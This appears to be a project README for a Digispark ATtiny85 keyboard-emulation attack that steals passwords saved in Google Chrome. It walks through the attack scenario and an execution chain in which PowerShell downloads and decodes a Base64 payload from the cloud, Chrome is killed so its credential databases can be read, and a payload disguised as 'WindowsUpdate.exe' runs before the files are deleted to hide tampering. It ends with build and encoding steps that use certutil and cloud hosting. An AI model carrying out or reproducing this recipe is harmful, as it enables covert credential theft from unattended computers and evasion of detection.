
Exploits USB HID to steal passwords saved in Google Chrome

Primary LanguagePython


This project demonstrates how USB keyboard emulation can be exploited using the Digispark ATtiny85 development board to swipe passwords saved in Google Chrome.


  • Minimize time for attacker to keep device plugged in
  • Fit initial exploit code onto limited flash memory on ATtiny85
  • Leave no traces behind after victim has been pwned


  1. Victim plugs in unknown USB device with ATtiny and code implanted
  2. Attack executes


  1. Victim leaves Windows computer unattended and unlocked to get some coffee
  2. Attacker approaches with hotspot (Ex. 'attwifi') This is only necessary if there are browsing restrictions on the host network
  3. Attacker plugs in ATtiny via USB and waits for red LED signal.
  4. Attacker unplugs device and flees the scene
  5. Attack executes



  • AtTiny84 emulates keyboard
  • Uses WINDOWS + R shortcut to open run prompt and open cmd and powershell
  • Connects to attackers wifi hotspot to bypass potential browsing restrictions
  • Uses powershell to download and decode Base64 encoded file stored in cloud
  • Runs decoded file (orion.bat)
  • Turns on LED on ATtiny so attacker knows to unplug and skrrt


  • Attack continues after attacker leaves
  • Writes and runs powershell script to download WindowsUpdate.exe from cloud
  • Opens Microsoft Edge to hide ghost code execution from bystanders
  • Decodes WindowsUpdate.exe from Base64
  • Kills Chrome process so databases can be read
  • Runs WindowsUpdate.exe
  • deletes all files created previously to hide traces of tampering


Compiling Instructions:

  1. Update WindowsUpdate.py with valid email credentials.
  2. Use py2exe to compile into exe file (since most Windows PCs don't come with Python).
  3. In command prompt run: certutil -encode WindowsUpdate.exe "certification.txt"
  4. Upload certification.txt to cloud and replace link in orion.bat
  5. In command prompt run: certutil -encode orion.bat "emerald.txt"
  6. Upload emerald.txt to cloud and replace link in payload.ino
  7. Compile and upload payload.ino to ATtiny Device using Arduino IDE